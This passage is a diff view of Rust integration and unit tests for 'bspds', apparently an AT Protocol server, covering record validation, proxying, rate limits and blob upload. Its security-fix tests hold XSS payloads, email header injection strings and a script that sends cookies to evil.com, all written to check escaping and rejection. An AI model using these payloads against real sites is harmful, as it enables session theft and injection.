assert!(did_key.starts_with("did:key:z"), "Should start with did:key:z"); 337 358 assert!(did_key.len() > 50, "Did key should be reasonably long"); 338 359 } 360 + 339 361 #[test] 340 362 fn test_signing_key_to_did_key_unique() { 341 363 let key1 = SigningKey::random(&mut rand::thread_rng()); ··· 344 366 let did2 = signing_key_to_did_key(&key2); 345 367 assert_ne!(did1, did2, "Different keys should produce different did:keys"); 346 368 } 369 + 347 370 #[test] 348 371 fn test_signing_key_to_did_key_consistent() { 349 372 let key = SigningKey::random(&mut rand::thread_rng()); ··· 351 374 let did2 = signing_key_to_did_key(&key); 352 375 assert_eq!(did1, did2, "Same key should produce same did:key"); 353 376 } 377 + 354 378 #[test] 355 379 fn test_sign_operation_removes_existing_sig() { 356 380 let key = SigningKey::random(&mut rand::thread_rng()); ··· 367 391 let new_sig = signed.get("sig").and_then(|v| v.as_str()).unwrap(); 368 392 assert_ne!(new_sig, "old_signature", "Should replace old signature"); 369 393 } 394 + 370 395 #[test] 371 396 fn test_validate_plc_operation_not_object() { 372 397 let result = validate_plc_operation(&json!("not an object")); 373 398 assert!(matches!(result, Err(PlcError::InvalidResponse(_)))); 374 399 } 400 + 375 401 #[test] 376 402 fn test_validate_for_submission_tombstone_passes() { 377 403 let key = SigningKey::random(&mut rand::thread_rng()); ··· 390 416 let result = validate_plc_operation_for_submission(&op, &ctx); 391 417 assert!(result.is_ok(), "Tombstone should pass submission validation"); 392 418 } 419 + 393 420 #[test] 394 421 fn test_verify_signature_missing_sig() { 395 422 let op = json!({ ··· 402 429 let result = verify_operation_signature(&op, &[]); 403 430 assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("sig"))); 404 431 } 432 + 405 433 #[test] 406 434 fn test_verify_signature_invalid_base64() { 407 435 let op = json!({ ··· 415 443 let result = verify_operation_signature(&op, &[]); 416 444 assert!(matches!(result, Err(PlcError::InvalidResponse(_)))); 417 445 } 446 + 418 447 #[test] 419 448 fn test_plc_operation_struct() { 420 449 let mut services = HashMap::new();
+5
tests/proxy.rs
··· 4 4 use reqwest::Client; 5 5 use std::sync::Arc; 6 6 use tokio::net::TcpListener; 7 + 7 8 async fn spawn_mock_upstream() -> ( 8 9 String, 9 10 tokio::sync::mpsc::Receiver<(String, String, Option<String>)>, ··· 31 32 }); 32 33 (format!("http://{}", addr), rx) 33 34 } 35 + 34 36 #[tokio::test] 35 37 async fn test_proxy_via_header() { 36 38 let app_url = common::base_url().await; ··· 49 51 assert_eq!(uri, "/xrpc/com.example.test"); 50 52 assert_eq!(auth, Some("Bearer test-token".to_string())); 51 53 } 54 + 52 55 #[tokio::test] 53 56 async fn test_proxy_auth_signing() { 54 57 let app_url = common::base_url().await; ··· 77 80 assert_eq!(claims["aud"], upstream_url); 78 81 assert_eq!(claims["lxm"], "com.example.signed"); 79 82 } 83 + 80 84 #[tokio::test] 81 85 async fn test_proxy_post_with_body() { 82 86 let app_url = common::base_url().await; ··· 100 104 assert_eq!(uri, "/xrpc/com.example.postMethod"); 101 105 assert_eq!(auth, Some("Bearer test-token".to_string())); 102 106 } 107 + 103 108 #[tokio::test] 104 109 async fn test_proxy_with_query_params() { 105 110 let app_url = common::base_url().await;
+5
tests/rate_limit.rs
··· 2 2 use common::{base_url, client}; 3 3 use reqwest::StatusCode; 4 4 use serde_json::json; 5 + 5 6 #[tokio::test] 6 7 #[ignore = "rate limiting is disabled in test environment"] 7 8 async fn test_login_rate_limiting() { ··· 39 40 rate_limited_count 40 41 ); 41 42 } 43 + 42 44 #[tokio::test] 43 45 #[ignore = "rate limiting is disabled in test environment"] 44 46 async fn test_password_reset_rate_limiting() { ··· 78 80 success_count 79 81 ); 80 82 } 83 + 81 84 #[tokio::test] 82 85 #[ignore = "rate limiting is disabled in test environment"] 83 86 async fn test_account_creation_rate_limiting() { ··· 117 120 rate_limited_count 118 121 ); 119 122 } 123 + 120 124 #[tokio::test] 121 125 async fn test_valkey_connection() { 122 126 if std::env::var("VALKEY_URL").is_err() { ··· 154 158 .await 155 159 .expect("DEL failed"); 156 160 } 161 + 157 162 #[tokio::test] 158 163 async fn test_distributed_rate_limiter_directly() { 159 164 if std::env::var("VALKEY_URL").is_err() {
+53
tests/record_validation.rs
··· 1 1 use bspds::validation::{RecordValidator, ValidationError, ValidationStatus, validate_record_key, validate_collection_nsid}; 2 2 use serde_json::json; 3 + 3 4 fn now() -> String { 4 5 chrono::Utc::now().to_rfc3339() 5 6 } 7 + 6 8 #[test] 7 9 fn test_validate_post_valid() { 8 10 let validator = RecordValidator::new(); ··· 14 16 let result = validator.validate(&post, "app.bsky.feed.post"); 15 17 assert_eq!(result.unwrap(), ValidationStatus::Valid); 16 18 } 19 + 17 20 #[test] 18 21 fn test_validate_post_missing_text() { 19 22 let validator = RecordValidator::new(); ··· 24 27 let result = validator.validate(&post, "app.bsky.feed.post"); 25 28 assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "text")); 26 29 } 30 + 27 31 #[test] 28 32 fn test_validate_post_missing_created_at() { 29 33 let validator = RecordValidator::new(); ··· 34 38 let result = validator.validate(&post, "app.bsky.feed.post"); 35 39 assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "createdAt")); 36 40 } 41 + 37 42 #[test] 38 43 fn test_validate_post_text_too_long() { 39 44 let validator = RecordValidator::new(); ··· 46 51 let result = validator.validate(&post, "app.bsky.feed.post"); 47 52 assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "text")); 48 53 } 54 + 49 55 #[test] 50 56 fn test_validate_post_text_at_limit() { 51 57 let validator = RecordValidator::new(); ··· 58 64 let result = validator.validate(&post, "app.bsky.feed.post"); 59 65 assert_eq!(result.unwrap(), ValidationStatus::Valid); 60 66 } 67 + 61 68 #[test] 62 69 fn test_validate_post_too_many_langs() { 63 70 let validator = RecordValidator::new(); ··· 70 77 let result = validator.validate(&post, "app.bsky.feed.post"); 71 78 assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "langs")); 72 79 } 80 + 73 81 #[test] 74 82 fn test_validate_post_three_langs_ok() { 75 83 let validator = RecordValidator::new(); ··· 82 90 let result = validator.validate(&post, "app.bsky.feed.post"); 83 91 assert_eq!(result.unwrap(), ValidationStatus::Valid); 84 92 } 93 + 85 94 #[test] 86 95 fn test_validate_post_too_many_tags() { 87 96 let validator = RecordValidator::new(); ··· 94 103 let result = validator.validate(&post, "app.bsky.feed.post"); 95 104 assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "tags")); 96 105 } 106 + 97 107 #[test] 98 108 fn test_validate_post_eight_tags_ok() { 99 109 let validator = RecordValidator::new(); ··· 106 116 let result = validator.validate(&post, "app.bsky.feed.post"); 107 117 assert_eq!(result.unwrap(), ValidationStatus::Valid); 108 118 } 119 + 109 120 #[test] 110 121 fn test_validate_post_tag_too_long() { 111 122 let validator = RecordValidator::new(); ··· 119 130 let result = validator.validate(&post, "app.bsky.feed.post"); 120 131 assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path.starts_with("tags/"))); 121 132 } 133 + 122 134 #[test] 123 135 fn test_validate_profile_valid() { 124 136 let validator = RecordValidator::new(); ··· 130 142 let result = validator.validate(&profile, "app.bsky.actor.profile"); 131 143 assert_eq!(result.unwrap(), ValidationStatus::Valid); 132 144 } 145 + 133 146 #[test] 134 147 fn test_validate_profile_empty_ok() { 135 148 let validator = RecordValidator::new(); ··· 139 152 let result = validator.validate(&profile, "app.bsky.actor.profile"); 140 153 assert_eq!(result.unwrap(), ValidationStatus::Valid); 141 154 } 155 + 142 156 #[test] 143 157 fn test_validate_profile_displayname_too_long() { 144 158 let validator = RecordValidator::new(); ··· 150 164 let result = validator.validate(&profile, "app.bsky.actor.profile"); 151 165 assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "displayName")); 152 166 } 167 + 153 168 #[test] 154 169 fn test_validate_profile_description_too_long() { 155 170 let validator = RecordValidator::new(); ··· 161 176 let result = validator.validate(&profile, "app.bsky.actor.profile"); 162 177 assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "description")); 163 178 } 179 + 164 180 #[test] 165 181 fn test_validate_like_valid() { 166 182 let validator = RecordValidator::new(); ··· 175 191 let result = validator.validate(&like, "app.bsky.feed.like"); 176 192 assert_eq!(result.unwrap(), ValidationStatus::Valid); 177 193 } 194 + 178 195 #[test] 179 196 fn test_validate_like_missing_subject() { 180 197 let validator = RecordValidator::new(); ··· 185 202 let result = validator.validate(&like, "app.bsky.feed.like"); 186 203 assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "subject")); 187 204 } 205 + 188 206 #[test] 189 207 fn test_validate_like_missing_subject_uri() { 190 208 let validator = RecordValidator::new(); ··· 198 216 let result = validator.validate(&like, "app.bsky.feed.like"); 199 217 assert!(matches!(result, Err(ValidationError::MissingField(f)) if f.contains("uri"))); 200 218 } 219 + 201 220 #[test] 202 221 fn test_validate_like_invalid_subject_uri() { 203 222 let validator = RecordValidator::new(); ··· 212 231 let result = validator.validate(&like, "app.bsky.feed.like"); 213 232 assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path.contains("uri"))); 214 233 } 234 + 215 235 #[test] 216 236 fn test_validate_repost_valid() { 217 237 let validator = RecordValidator::new(); ··· 226 246 let result = validator.validate(&repost, "app.bsky.feed.repost"); 227 247 assert_eq!(result.unwrap(), ValidationStatus::Valid); 228 248 } 249 + 229 250 #[test] 230 251 fn test_validate_repost_missing_subject() { 231 252 let validator = RecordValidator::new(); ··· 236 257 let result = validator.validate(&repost, "app.bsky.feed.repost"); 237 258 assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "subject")); 238 259 } 260 + 239 261 #[test] 240 262 fn test_validate_follow_valid() { 241 263 let validator = RecordValidator::new(); ··· 247 269 let result = validator.validate(&follow, "app.bsky.graph.follow"); 248 270 assert_eq!(result.unwrap(), ValidationStatus::Valid); 249 271 } 272 + 250 273 #[test] 251 274 fn test_validate_follow_missing_subject() { 252 275 let validator = RecordValidator::new(); ··· 257 280 let result = validator.validate(&follow, "app.bsky.graph.follow"); 258 281 assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "subject")); 259 282 } 283 + 260 284 #[test] 261 285 fn test_validate_follow_invalid_subject() { 262 286 let validator = RecordValidator::new(); ··· 268 292 let result = validator.validate(&follow, "app.bsky.graph.follow"); 269 293 assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "subject")); 270 294 } 295 + 271 296 #[test] 272 297 fn test_validate_block_valid() { 273 298 let validator = RecordValidator::new(); ··· 279 304 let result = validator.validate(&block, "app.bsky.graph.block"); 280 305 assert_eq!(result.unwrap(), ValidationStatus::Valid); 281 306 } 307 + 282 308 #[test] 283 309 fn test_validate_block_invalid_subject() { 284 310 let validator = RecordValidator::new(); ··· 290 316 let result = validator.validate(&block, "app.bsky.graph.block"); 291 317 assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "subject")); 292 318 } 319 + 293 320 #[test] 294 321 fn test_validate_list_valid() { 295 322 let validator = RecordValidator::new(); ··· 302 329 let result = validator.validate(&list, "app.bsky.graph.list"); 303 330 assert_eq!(result.unwrap(), ValidationStatus::Valid); 304 331 } 332 + 305 333 #[test] 306 334 fn test_validate_list_name_too_long() { 307 335 let validator = RecordValidator::new(); ··· 315 343 let result = validator.validate(&list, "app.bsky.graph.list"); 316 344 assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "name")); 317 345 } 346 + 318 347 #[test] 319 348 fn test_validate_list_empty_name() { 320 349 let validator = RecordValidator::new(); ··· 327 356 let result = validator.validate(&list, "app.bsky.graph.list"); 328 357 assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "name")); 329 358 } 359 + 330 360 #[test] 331 361 fn test_validate_feed_generator_valid() { 332 362 let validator = RecordValidator::new(); ··· 339 369 let result = validator.validate(&generator, "app.bsky.feed.generator"); 340 370 assert_eq!(result.unwrap(), ValidationStatus::Valid); 341 371 } 372 + 342 373 #[test] 343 374 fn test_validate_feed_generator_displayname_too_long() { 344 375 let validator = RecordValidator::new(); ··· 352 383 let result = validator.validate(&generator, "app.bsky.feed.generator"); 353 384 assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "displayName")); 354 385 } 386 + 355 387 #[test] 356 388 fn test_validate_unknown_type_returns_unknown() { 357 389 let validator = RecordValidator::new(); ··· 362 394 let result = validator.validate(&custom, "com.custom.record"); 363 395 assert_eq!(result.unwrap(), ValidationStatus::Unknown); 364 396 } 397 + 365 398 #[test] 366 399 fn test_validate_unknown_type_strict_rejects() { 367 400 let validator = RecordValidator::new().require_lexicon(true); ··· 372 405 let result = validator.validate(&custom, "com.custom.record"); 373 406 assert!(matches!(result, Err(ValidationError::UnknownType(_)))); 374 407 } 408 + 375 409 #[test] 376 410 fn test_validate_type_mismatch() { 377 411 let validator = RecordValidator::new(); ··· 384 418 assert!(matches!(result, Err(ValidationError::TypeMismatch { expected, actual }) 385 419 if expected == "app.bsky.feed.post" && actual == "app.bsky.feed.like")); 386 420 } 421 + 387 422 #[test] 388 423 fn test_validate_missing_type() { 389 424 let validator = RecordValidator::new(); ··· 393 428 let result = validator.validate(&record, "app.bsky.feed.post"); 394 429 assert!(matches!(result, Err(ValidationError::MissingType))); 395 430 } 431 + 396 432 #[test] 397 433 fn test_validate_not_object() { 398 434 let validator = RecordValidator::new(); ··· 400 436 let result = validator.validate(&record, "app.bsky.feed.post"); 401 437 assert!(matches!(result, Err(ValidationError::InvalidRecord(_)))); 402 438 } 439 + 403 440 #[test] 404 441 fn test_validate_datetime_format_valid() { 405 442 let validator = RecordValidator::new(); ··· 411 448 let result = validator.validate(&post, "app.bsky.feed.post"); 412 449 assert_eq!(result.unwrap(), ValidationStatus::Valid); 413 450 } 451 + 414 452 #[test] 415 453 fn test_validate_datetime_with_offset() { 416 454 let validator = RecordValidator::new(); ··· 422 460 let result = validator.validate(&post, "app.bsky.feed.post"); 423 461 assert_eq!(result.unwrap(), ValidationStatus::Valid); 424 462 } 463 + 425 464 #[test] 426 465 fn test_validate_datetime_invalid_format() { 427 466 let validator = RecordValidator::new(); ··· 433 472 let result = validator.validate(&post, "app.bsky.feed.post"); 434 473 assert!(matches!(result, Err(ValidationError::InvalidDatetime { .. }))); 435 474 } 475 + 436 476 #[test] 437 477 fn test_validate_record_key_valid() { 438 478 assert!(validate_record_key("3k2n5j2").is_ok()); ··· 442 482 assert!(validate_record_key("valid~key").is_ok()); 443 483 assert!(validate_record_key("self").is_ok()); 444 484 } 485 + 445 486 #[test] 446 487 fn test_validate_record_key_empty() { 447 488 let result = validate_record_key(""); 448 489 assert!(matches!(result, Err(ValidationError::InvalidRecord(_)))); 449 490 } 491 + 450 492 #[test] 451 493 fn test_validate_record_key_dot() { 452 494 assert!(validate_record_key(".").is_err()); 453 495 assert!(validate_record_key("..").is_err()); 454 496 } 497 + 455 498 #[test] 456 499 fn test_validate_record_key_invalid_chars() { 457 500 assert!(validate_record_key("invalid/key").is_err()); ··· 459 502 assert!(validate_record_key("invalid@key").is_err()); 460 503 assert!(validate_record_key("invalid#key").is_err()); 461 504 } 505 + 462 506 #[test] 463 507 fn test_validate_record_key_too_long() { 464 508 let long_key = "k".repeat(513); 465 509 let result = validate_record_key(&long_key); 466 510 assert!(matches!(result, Err(ValidationError::InvalidRecord(_)))); 467 511 } 512 + 468 513 #[test] 469 514 fn test_validate_record_key_at_max_length() { 470 515 let max_key = "k".repeat(512); 471 516 assert!(validate_record_key(&max_key).is_ok()); 472 517 } 518 + 473 519 #[test] 474 520 fn test_validate_collection_nsid_valid() { 475 521 assert!(validate_collection_nsid("app.bsky.feed.post").is_ok()); ··· 477 523 assert!(validate_collection_nsid("a.b.c").is_ok()); 478 524 assert!(validate_collection_nsid("my-app.domain.record-type").is_ok()); 479 525 } 526 + 480 527 #[test] 481 528 fn test_validate_collection_nsid_empty() { 482 529 let result = validate_collection_nsid(""); 483 530 assert!(matches!(result, Err(ValidationError::InvalidRecord(_)))); 484 531 } 532 + 485 533 #[test] 486 534 fn test_validate_collection_nsid_too_few_segments() { 487 535 assert!(validate_collection_nsid("a").is_err()); 488 536 assert!(validate_collection_nsid("a.b").is_err()); 489 537 } 538 + 490 539 #[test] 491 540 fn test_validate_collection_nsid_empty_segment() { 492 541 assert!(validate_collection_nsid("a..b.c").is_err()); 493 542 assert!(validate_collection_nsid(".a.b.c").is_err()); 494 543 assert!(validate_collection_nsid("a.b.c.").is_err()); 495 544 } 545 + 496 546 #[test] 497 547 fn test_validate_collection_nsid_invalid_chars() { 498 548 assert!(validate_collection_nsid("a.b.c/d").is_err()); 499 549 assert!(validate_collection_nsid("a.b.c_d").is_err()); 500 550 assert!(validate_collection_nsid("a.b.c@d").is_err()); 501 551 } 552 + 502 553 #[test] 503 554 fn test_validate_threadgate() { 504 555 let validator = RecordValidator::new(); ··· 510 561 let result = validator.validate(&gate, "app.bsky.feed.threadgate"); 511 562 assert_eq!(result.unwrap(), ValidationStatus::Valid); 512 563 } 564 + 513 565 #[test] 514 566 fn test_validate_labeler_service() { 515 567 let validator = RecordValidator::new(); ··· 523 575 let result = validator.validate(&labeler, "app.bsky.labeler.service"); 524 576 assert_eq!(result.unwrap(), ValidationStatus::Valid); 525 577 } 578 + 526 579 #[test] 527 580 fn test_validate_list_item() { 528 581 let validator = RecordValidator::new();
+6
tests/repo_batch.rs
··· 3 3 use chrono::Utc; 4 4 use reqwest::StatusCode; 5 5 use serde_json::{Value, json}; 6 + 6 7 #[tokio::test] 7 8 async fn test_apply_writes_create() { 8 9 let client = client(); ··· 50 51 assert!(results[0]["uri"].is_string()); 51 52 assert!(results[0]["cid"].is_string()); 52 53 } 54 + 53 55 #[tokio::test] 54 56 async fn test_apply_writes_update() { 55 57 let client = client(); ··· 108 110 assert_eq!(results.len(), 1); 109 111 assert!(results[0]["uri"].is_string()); 110 112 } 113 + 111 114 #[tokio::test] 112 115 async fn test_apply_writes_delete() { 113 116 let client = client(); ··· 171 174 .expect("Failed to verify"); 172 175 assert_eq!(get_res.status(), StatusCode::NOT_FOUND); 173 176 } 177 + 174 178 #[tokio::test] 175 179 async fn test_apply_writes_mixed_operations() { 176 180 let client = client(); ··· 258 262 let results = body["results"].as_array().unwrap(); 259 263 assert_eq!(results.len(), 3); 260 264 } 265 + 261 266 #[tokio::test] 262 267 async fn test_apply_writes_no_auth() { 263 268 let client = client(); ··· 286 291 .expect("Failed to send request"); 287 292 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 288 293 } 294 + 289 295 #[tokio::test] 290 296 async fn test_apply_writes_empty_writes() { 291 297 let client = client();
+6
tests/repo_blob.rs
··· 2 2 use common::*; 3 3 use reqwest::{StatusCode, header}; 4 4 use serde_json::Value; 5 + 5 6 #[tokio::test] 6 7 async fn test_upload_blob_no_auth() { 7 8 let client = client(); ··· 19 20 let body: Value = res.json().await.expect("Response was not valid JSON"); 20 21 assert_eq!(body["error"], "AuthenticationRequired"); 21 22 } 23 + 22 24 #[tokio::test] 23 25 async fn test_upload_blob_success() { 24 26 let client = client(); ··· 38 40 let body: Value = res.json().await.expect("Response was not valid JSON"); 39 41 assert!(body["blob"]["ref"]["$link"].as_str().is_some()); 40 42 } 43 + 41 44 #[tokio::test] 42 45 async fn test_upload_blob_bad_token() { 43 46 let client = client(); ··· 56 59 let body: Value = res.json().await.expect("Response was not valid JSON"); 57 60 assert_eq!(body["error"], "AuthenticationFailed"); 58 61 } 62 + 59 63 #[tokio::test] 60 64 async fn test_upload_blob_unsupported_mime_type() { 61 65 let client = client(); ··· 73 77 .expect("Failed to send request"); 74 78 assert_eq!(res.status(), StatusCode::OK); 75 79 } 80 + 76 81 #[tokio::test] 77 82 async fn test_list_missing_blobs() { 78 83 let client = client(); ··· 90 95 let body: Value = res.json().await.expect("Response was not valid JSON"); 91 96 assert!(body["blobs"].is_array()); 92 97 } 98 + 93 99 #[tokio::test] 94 100 async fn test_list_missing_blobs_no_auth() { 95 101 let client = client();
+39
tests/security_fixes.rs
··· 4 4 }; 5 5 use bspds::oauth::templates::{login_page, error_page, success_page}; 6 6 use bspds::image::{ImageProcessor, ImageError}; 7 + 7 8 #[test] 8 9 fn test_sanitize_header_value_removes_crlf() { 9 10 let malicious = "Injected\r\nBcc: attacker@evil.com"; ··· 13 14 assert!(sanitized.contains("Injected"), "Original content should be preserved"); 14 15 assert!(sanitized.contains("Bcc:"), "Text after newline should be on same line (no header injection)"); 15 16 } 17 + 16 18 #[test] 17 19 fn test_sanitize_header_value_preserves_content() { 18 20 let normal = "Normal Subject Line"; 19 21 let sanitized = sanitize_header_value(normal); 20 22 assert_eq!(sanitized, "Normal Subject Line"); 21 23 } 24 + 22 25 #[test] 23 26 fn test_sanitize_header_value_trims_whitespace() { 24 27 let padded = " Subject "; 25 28 let sanitized = sanitize_header_value(padded); 26 29 assert_eq!(sanitized, "Subject"); 27 30 } 31 + 28 32 #[test] 29 33 fn test_sanitize_header_value_handles_multiple_newlines() { 30 34 let input = "Line1\r\nLine2\nLine3\rLine4"; ··· 34 38 assert!(sanitized.contains("Line1"), "Content before newlines preserved"); 35 39 assert!(sanitized.contains("Line4"), "Content after newlines preserved"); 36 40 } 41 + 37 42 #[test] 38 43 fn test_email_header_injection_sanitization() { 39 44 let header_injection = "Normal Subject\r\nBcc: attacker@evil.com\r\nX-Injected: value"; ··· 44 49 assert!(sanitized.contains("Bcc:"), "Content after CRLF preserved as same line text"); 45 50 assert!(sanitized.contains("X-Injected:"), "All content on same line"); 46 51 } 52 + 47 53 #[test] 48 54 fn test_valid_phone_number_accepts_correct_format() { 49 55 assert!(is_valid_phone_number("+1234567890")); ··· 52 58 assert!(is_valid_phone_number("+4915123456789")); 53 59 assert!(is_valid_phone_number("+1")); 54 60 } 61 + 55 62 #[test] 56 63 fn test_valid_phone_number_rejects_missing_plus() { 57 64 assert!(!is_valid_phone_number("1234567890")); 58 65 assert!(!is_valid_phone_number("12025551234")); 59 66 } 67 + 60 68 #[test] 61 69 fn test_valid_phone_number_rejects_empty() { 62 70 assert!(!is_valid_phone_number("")); 63 71 } 72 + 64 73 #[test] 65 74 fn test_valid_phone_number_rejects_just_plus() { 66 75 assert!(!is_valid_phone_number("+")); 67 76 } 77 + 68 78 #[test] 69 79 fn test_valid_phone_number_rejects_too_long() { 70 80 assert!(!is_valid_phone_number("+12345678901234567890123")); 71 81 } 82 + 72 83 #[test] 73 84 fn test_valid_phone_number_rejects_letters() { 74 85 assert!(!is_valid_phone_number("+abc123")); 75 86 assert!(!is_valid_phone_number("+1234abc")); 76 87 assert!(!is_valid_phone_number("+a")); 77 88 } 89 + 78 90 #[test] 79 91 fn test_valid_phone_number_rejects_spaces() { 80 92 assert!(!is_valid_phone_number("+1234 5678")); 81 93 assert!(!is_valid_phone_number("+ 1234567890")); 82 94 assert!(!is_valid_phone_number("+1 ")); 83 95 } 96 + 84 97 #[test] 85 98 fn test_valid_phone_number_rejects_special_chars() { 86 99 assert!(!is_valid_phone_number("+123-456-7890")); 87 100 assert!(!is_valid_phone_number("+1(234)567890")); 88 101 assert!(!is_valid_phone_number("+1.234.567.890")); 89 102 } 103 + 90 104 #[test] 91 105 fn test_signal_recipient_command_injection_blocked() { 92 106 let malicious_inputs = vec![ ··· 103 117 assert!(!is_valid_phone_number(input), "Malicious input '{}' should be rejected", input); 104 118 } 105 119 } 120 + 106 121 #[test] 107 122 fn test_image_file_size_limit_enforced() { 108 123 let processor = ImageProcessor::new(); ··· 119 134 Ok(_) => panic!("Should reject files over size limit"), 120 135 } 121 136 } 137 + 122 138 #[test] 123 139 fn test_image_file_size_limit_configurable() { 124 140 let processor = ImageProcessor::new().with_max_file_size(1024); ··· 126 142 let result = processor.process(&data, "image/jpeg"); 127 143 assert!(result.is_err(), "Should reject files over configured limit"); 128 144 } 145 + 129 146 #[test] 130 147 fn test_oauth_template_xss_escaping_client_id() { 131 148 let malicious_client_id = "<script>alert('xss')</script>"; ··· 133 150 assert!(!html.contains("<script>"), "Script tags should be escaped"); 134 151 assert!(html.contains("&lt;script&gt;"), "HTML entities should be used for escaping"); 135 152 } 153 + 136 154 #[test] 137 155 fn test_oauth_template_xss_escaping_client_name() { 138 156 let malicious_client_name = "<img src=x onerror=alert('xss')>"; ··· 140 158 assert!(!html.contains("<img "), "IMG tags should be escaped"); 141 159 assert!(html.contains("&lt;img"), "IMG tag should be escaped as HTML entity"); 142 160 } 161 + 143 162 #[test] 144 163 fn test_oauth_template_xss_escaping_scope() { 145 164 let malicious_scope = "\"><script>alert('xss')</script>"; 146 165 let html = login_page("client123", None, Some(malicious_scope), "test-uri", None, None); 147 166 assert!(!html.contains("<script>"), "Script tags in scope should be escaped"); 148 167 } 168 + 149 169 #[test] 150 170 fn test_oauth_template_xss_escaping_error_message() { 151 171 let malicious_error = "<script>document.location='http://evil.com?c='+document.cookie</script>"; 152 172 let html = login_page("client123", None, None, "test-uri", Some(malicious_error), None); 153 173 assert!(!html.contains("<script>"), "Script tags in error should be escaped"); 154 174 } 175 + 155 176 #[test] 156 177 fn test_oauth_template_xss_escaping_login_hint() { 157 178 let malicious_hint = "\" onfocus=\"alert('xss')\" autofocus=\""; ··· 159 180 assert!(!html.contains("onfocus=\"alert"), "Event handlers should be escaped in login hint"); 160 181 assert!(html.contains("&quot;"), "Quotes should be escaped"); 161 182 } 183 + 162 184 #[test] 163 185 fn test_oauth_template_xss_escaping_request_uri() { 164 186 let malicious_uri = "\" onmouseover=\"alert('xss')\""; 165 187 let html = login_page("client123", None, None, malicious_uri, None, None); 166 188 assert!(!html.contains("onmouseover=\"alert"), "Event handlers should be escaped in request_uri"); 167 189 } 190 + 168 191 #[test] 169 192 fn test_oauth_error_page_xss_escaping() { 170 193 let malicious_error = "<script>steal()</script>"; ··· 173 196 assert!(!html.contains("<script>"), "Script tags should be escaped in error page"); 174 197 assert!(!html.contains("<img "), "IMG tags should be escaped in error page"); 175 198 } 199 + 176 200 #[test] 177 201 fn test_oauth_success_page_xss_escaping() { 178 202 let malicious_name = "<script>steal_session()</script>"; 179 203 let html = success_page(Some(malicious_name)); 180 204 assert!(!html.contains("<script>"), "Script tags should be escaped in success page"); 181 205 } 206 + 182 207 #[test] 183 208 fn test_oauth_template_no_javascript_urls() { 184 209 let html = login_page("client123", None, None, "test-uri", None, None); ··· 188 213 let success_html = success_page(None); 189 214 assert!(!success_html.contains("javascript:"), "Success page should not contain javascript: URLs"); 190 215 } 216 + 191 217 #[test] 192 218 fn test_oauth_template_form_action_safe() { 193 219 let malicious_uri = "javascript:alert('xss')//"; 194 220 let html = login_page("client123", None, None, malicious_uri, None, None); 195 221 assert!(html.contains("action=\"/oauth/authorize\""), "Form action should be fixed URL"); 196 222 } 223 + 197 224 #[test] 198 225 fn test_send_error_types_have_display() { 199 226 let timeout = SendError::Timeout; ··· 203 230 assert!(!format!("{}", max_retries).is_empty()); 204 231 assert!(!format!("{}", invalid_recipient).is_empty()); 205 232 } 233 + 206 234 #[test] 207 235 fn test_send_error_timeout_message() { 208 236 let error = SendError::Timeout; 209 237 let msg = format!("{}", error); 210 238 assert!(msg.to_lowercase().contains("timeout"), "Timeout error should mention timeout"); 211 239 } 240 + 212 241 #[test] 213 242 fn test_send_error_max_retries_includes_detail() { 214 243 let error = SendError::MaxRetriesExceeded("Server returned 503".to_string()); 215 244 let msg = format!("{}", error); 216 245 assert!(msg.contains("503") || msg.contains("retries"), "MaxRetriesExceeded should include context"); 217 246 } 247 + 218 248 #[tokio::test] 219 249 async fn test_check_signup_queue_accepts_session_jwt() { 220 250 use common::{base_url, client, create_account_and_login}; ··· 231 261 let body: serde_json::Value = res.json().await.unwrap(); 232 262 assert_eq!(body["activated"], true); 233 263 } 264 + 234 265 #[tokio::test] 235 266 async fn test_check_signup_queue_no_auth() { 236 267 use common::{base_url, client}; ··· 245 276 let body: serde_json::Value = res.json().await.unwrap(); 246 277 assert_eq!(body["activated"], true); 247 278 } 279 + 248 280 #[test] 249 281 fn test_html_escape_ampersand() { 250 282 let html = login_page("client&test", None, None, "test-uri", None, None); 251 283 assert!(html.contains("&amp;"), "Ampersand should be escaped"); 252 284 assert!(!html.contains("client&test"), "Raw ampersand should not appear in output"); 253 285 } 286 + 254 287 #[test] 255 288 fn test_html_escape_quotes() { 256 289 let html = login_page("client\"test'more", None, None, "test-uri", None, None); 257 290 assert!(html.contains("&quot;") || html.contains("&#34;"), "Double quotes should be escaped"); 258 291 assert!(html.contains("&#39;") || html.contains("&apos;"), "Single quotes should be escaped"); 259 292 } 293 + 260 294 #[test] 261 295 fn test_html_escape_angle_brackets() { 262 296 let html = login_page("client<test>more", None, None, "test-uri", None, None); ··· 264 298 assert!(html.contains("&gt;"), "Greater than should be escaped"); 265 299 assert!(!html.contains("<test>"), "Raw angle brackets should not appear"); 266 300 } 301 + 267 302 #[test] 268 303 fn test_oauth_template_preserves_safe_content() { 269 304 let html = login_page("my-safe-client", Some("My Safe App"), Some("read write"), "valid-uri", None, Some("user@example.com")); ··· 271 306 assert!(html.contains("read write") || html.contains("read"), "Scope should be preserved"); 272 307 assert!(html.contains("user@example.com"), "Login hint should be preserved"); 273 308 } 309 + 274 310 #[test] 275 311 fn test_csrf_like_input_value_protection() { 276 312 let malicious = "\" onclick=\"alert('csrf')"; 277 313 let html = login_page("client", None, None, malicious, None, None); 278 314 assert!(!html.contains("onclick=\"alert"), "Event handlers should not be executable"); 279 315 } 316 + 280 317 #[test] 281 318 fn test_unicode_handling_in_templates() { 282 319 let unicode_client = "客户端 クライアント"; 283 320 let html = login_page(unicode_client, None, None, "test-uri", None, None); 284 321 assert!(html.contains("客户端") || html.contains("&#"), "Unicode should be 